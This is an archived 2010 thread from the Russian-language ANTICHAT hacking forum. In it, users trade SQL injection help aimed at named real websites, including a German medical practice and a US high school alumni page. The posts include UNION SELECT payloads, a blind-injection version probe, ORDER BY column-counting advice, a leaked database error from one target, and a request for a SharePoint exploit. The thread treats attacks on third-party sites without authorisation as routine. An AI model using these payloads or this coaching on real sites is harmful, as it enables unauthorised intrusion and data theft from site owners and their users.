ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.07.2010, 18:59
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
|
|
|
12.07.2010, 19:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от haito
haito said:
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring(version(),1,1)=5
крути как blind
|
|
|
|
12.07.2010, 20:10
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Что можно сделать, что бы выдалась ошибка? |
|
|
|
12.07.2010, 20:37
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от SeNaP
SeNaP said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Что можно сделать, что бы выдалась ошибка? да ничё какбы не сделаешь)
|
|
|
|
12.07.2010, 20:54
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
|
|
|
|
12.07.2010, 20:55
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от гаррет-тень
гаррет-тень said:
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
изменение контекста страницы.
ex.
order+by+1 -- страница загружается
order+by+100 -- Пустая страница
|
|
|
|
12.07.2010, 20:58
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
Спасибо.
|
|
|
|
12.07.2010, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
2597
Репутация:
0
|
|
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/alumni/html/queryTables.php on line 21
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977# |
|
|
|
12.07.2010, 21:05
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
[QUOTE="happygirl"]
happygirl said:
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#
|
|
|
|
13.07.2010, 00:27
|
|
Новичок
Регистрация: 16.05.2008
Сообщений: 14
Провел на форуме:
22777
Репутация:
0
|
|
Как использовать уязвимость в SharePoint ??? Примерчик можно ...???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
